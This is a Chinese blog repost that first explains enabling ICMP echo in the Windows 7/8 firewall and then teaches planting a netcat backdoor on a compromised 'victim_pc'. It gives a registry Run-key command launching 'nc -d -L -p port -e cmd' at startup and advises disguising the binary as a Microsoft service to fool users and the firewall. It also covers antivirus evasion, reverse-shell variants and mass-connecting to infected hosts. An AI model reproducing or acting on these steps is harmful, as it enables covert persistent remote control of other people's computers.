鸿 网 互 联 www.68idc.cn

ping不通win7、8解决方法以及nc后门的制作

来源:互联网 作者:佚名 时间:2015-01-10 23:36
网络前沿与资讯,网络风云,网站建设与运营,网赚技巧,软件系统应用,数码科技评测

默认情况下win7、8是不能被ping通的,出于安全考虑不允许外部主机对其进行Ping测试。(关闭防火墙不能解决此问题!!!)

解决方法:允许ICMP回显,设置如下:

Firewall.cpl——高级设置——入站规则——文件和打印机共享(回显请求 -ICMPv4-In),win7下有两个(域,公用专用),win8下有三个(域,公用,专用),右击启用规则即可,IPV6亦然,个人测试过程中发现其实只要启用公用这一项就Ok了。下面分别是win7和win8的firewall。

ping不通win7、8解决方法以及nc后门的制作

ping不通win7、8解决方法以及nc后门的制作

nc这把瑞士军刀的确是屡试不爽,唯一可惜的就是会被杀软查杀,只能自己做免杀,还好源代码是公开的,懂编程的话可以做源码级别的免杀,下面说下利用nc在内网做不会被杀软查杀的后门,并且无视远程pc用户名密码的修改,连接类型为正向主动型连接。假设通过各种溢出漏洞等拿到了Victim_pc的shell,当然nc需要传过去(这步有点问题,假设本地开了ftp,远程下载nc后会被360查杀,始终想不出有什么好的方法可以下载文件到victim_pc而不被查杀,除了做免杀,求高手指导),然后其实就是开启一个nc监听程序并返回shell,当然这边需要做到开机启动,比较好的方法就是添加到注册表启动项里面,reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v“键值名称” /d “nc –d –L –p port –e cmd /f“,这样就添加到开机启动项里面了,当然此处也需要一点点社工的思想,比如nc的改名,键值名称的改名,你需要写的比较像,因为msconfig以及任务管理器会显示。
 

ping不通win7、8解决方法以及nc后门的制作

ping不通win7、8解决方法以及nc后门的制作

这边我只是把nc改成了winsearch,当然完全可以改成能欺骗别人的名字,比如一些MS服务名啦等等。这样重启后victim_pc就会一直监听本地端口,本地就可以连接其ip、port得到其shell,这种后门的好处就是无视杀毒软件的查杀以及用户名密码的修改,原因没有过多深入,觉得应该是nc在杀软前启动的或者至少在杀软监视之前nc已经做好了监听工作。这边也会出现一个问题,就是启动项第一次运行nc工具的时候防火墙会弹出提示,是否允许通过,如果你把名字改的像一点,一般别人是会点击允许的。此外,需要一提的就是假设victim_pc的OS为win7,本地ping不通,但是nc是可以穿透的,,无视防火墙的限制。
 
也许有人会有疑问,既然得到shell后下载本地nc时被查杀,又如何做后续的步骤呢,亦或者nc已经做好了免杀,可以下载到远程pc,那不是随便了么。诚然,这的确是矛盾的地方,所以我说的只是一种思路,不用太钻牛角尖。另外可能会出现的一种情况就是,nc做好免杀后在当时可能是有用的,可是不能保证以后也可以免杀,必须相信杀软的更新速度和技术,所以这种方法还是有一定的参考价值的。

当然这边讲的情况是内网,其实外网也一样,只是你需要搜集对方的ip地址罢了,如果对方在内网,还需要做端口转发。在内网中还有个好处就是如果你给好多台pc都种了此nc后门,那么你完全可以自己写一个批处理程序来进行连接,程序我就不写了,思路如下:先扫描存活主机,当然需要强力一点的扫描软件,首推nmap,防止win7\8 ping不通的情况,接着开启n个nc连接存活主机。

另外这边讲的是正向连接型,有些情况下会被防火墙拦截,当然最好的就是反弹型的后门,其实原理也一样,本地nc监听,victim_pc主动连接,也可以做成开机启动项的形式,只不过需要循环连接本地主机(比如间隔时间为1min),而本地需要连接远端的时候开启监听,有点类似于灰鸽子反弹型木马的制作思想,其实远控工具无非就是把一些功能都集成到一起罢了。

此外不得不提的就是nc强大的功能,可以收发邮件,可以端口转发做中继,可以ftp,可以发送接收文件,还可以扫描ip、port,简直是无所不能,不得不注意的是它的大小仅仅只有60K,真不愧是瑞士军刀。

网友评论
<